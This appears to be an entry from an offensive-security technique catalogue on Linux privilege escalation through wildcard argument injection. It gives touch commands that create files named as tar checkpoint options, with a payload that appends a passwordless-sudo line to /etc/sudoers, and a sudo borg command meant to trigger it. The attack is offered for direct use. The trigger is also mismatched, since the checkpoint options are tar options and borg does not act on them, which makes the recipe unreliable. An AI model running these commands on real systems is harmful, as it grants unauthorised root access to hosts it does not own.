← Back to search

Wildcard Abuse for PrivEsc (tar/borg)

privesclinuxtool

Summary

Abuses a privileged command that uses a shell wildcard (*) by planting files whose names are interpreted as command-line options, achieving code execution.

Walkthrough

Use this when a root/sudo command runs over a wildcard (e.g. *) in a directory you control. File names become arguments to the command.

Steps

  • In the target directory, create files whose names act as options, e.g. --checkpoint=1 and a --checkpoint-action=exec=... payload that adds a sudoers entry.
  • When the privileged command expands the * and processes those file names as flags, your injected action executes with the command's privileges.

Commands

bash

touch '--checkpoint=1'
touch '--checkpoint-action=exec=sh -c "echo \"username ALL=(ALL) NOPASSWD: ALL\" >> /etc/sudoers"'

bash

sudo /usr/bin/borg extract /path/to/repo::archive *